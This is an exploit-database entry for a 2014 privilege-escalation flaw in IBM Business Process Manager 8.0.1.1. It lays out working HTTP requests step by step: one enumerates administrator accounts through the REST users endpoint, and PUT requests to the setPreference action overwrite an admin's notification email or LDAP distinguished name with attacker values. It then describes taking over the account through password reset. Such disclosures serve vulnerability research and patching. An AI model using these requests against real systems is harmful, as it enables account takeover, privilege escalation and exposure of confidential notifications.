header-logo
Suggest Exploit
vendor:
IBM BMPS (BPM)
by:
0in
7.5
CVSS
HIGH
User account reconfiguration/Privilege Escalation/Information Disclosure
CWE
Product Name: IBM BMPS (BPM)
Affected Version From: 8.0.1.1
Affected Version To: Newest versions can also be vulnerable
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2014

IBM BMPS (BPM) User account reconfiguration/Privilege Escalation/Information Disclosure

It is possible to change specific values in the accounts database by an authenticated but not privileged user. This can be done by invoking the setPreference action.

Mitigation:

Unknown
Source

Exploit-DB raw data:

Exploit Title: IBM BMPS (BPM) User account reconfiguration/Privilege Escalation/Information Disclosure
Date: 31.01.14
Exploit Author: 0in
Software link: http://www-03.ibm.com/software/products/en/business-process-manager-family/
Version: 8.0.1.1 (newest versions can also be vulnerable)

Vulnerability Description:
Its possible to change some specfic values in accounts database (in my case it was LDAP) by authenticated but not privileged user, invoking setPreference action

------------------------------------------------------------------------------------
First of all, we should enumerate existing users to find administrator account.
We should proceed following request:

GET /rest/bpm/wle/v1/users?filter=*admin*&maxresult=11&assignTaskidFilter=[INT TASK ID]&namesonly=false&parts=all HTTP/1.1
x-requested-with: XMLHttpRequest

In result of this request we can get response like this:
{"status":"200","data":{"users":[{"userID":1,"userName":"admin","fullName":"Administrator BPMS","isDisabled":false,"primaryGroup":null,"emailAddress":"admin@corpo","userPreferences":{ "Portal Default Page":"/dashboards?dashboard=%2Fteamworks%2FexecuteServiceByName%3FprocessApp%3DSCIM%26serviceName%History%2Bprocess%25C3%25B3w%26snapshot%3D4.0.0%26zResumable%3Dtrue", "Task Email Address":"admin@corpo","Task Notification":"true","LDAPDistinguishedName":"CN=bpmsadmin,OU=confidential,OU=Users,OU=RU,DC= confidential,DC= confidential,DC=corp,DC= confidential ","Locale":"ru","Alert On Assign And Run":"true"},"tasksCollaboration":null,"memberships":["Debug","admins","authors","portal_admins","process_owners","allusers","All Users_S_da7e4d23-78cb-4483-*******",[…]

Ok, so now we have administrator username, in next step we should set his email or LDAPDistinguishedName to our, to invoke this, we should generate url like this:

PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=Task%20Email%20Address&value=AttackerEmail@corpo HTTP/1.1
x-requested-with: XMLHttpRequest

Or just set LDAP preferences to our:
PUT /rest/bpm/wle/v1/user/admin?action=setPreference&key=LDAPDistinguishedName&value= CN=ATTACKER_LOGIN,OU=w00tw00t,OU=Users,OU=Group,DC=my,DC=sub,DC=domain,DC=corpo HTTP/1.1


Now attacker can receive all notifications about victim processes in his email, attacker can change victim password using “forgotten password” option, change victim portal default page, LDAP Attributes. We have lot of other possibilities to exploit this situation it depends of BPMS service context.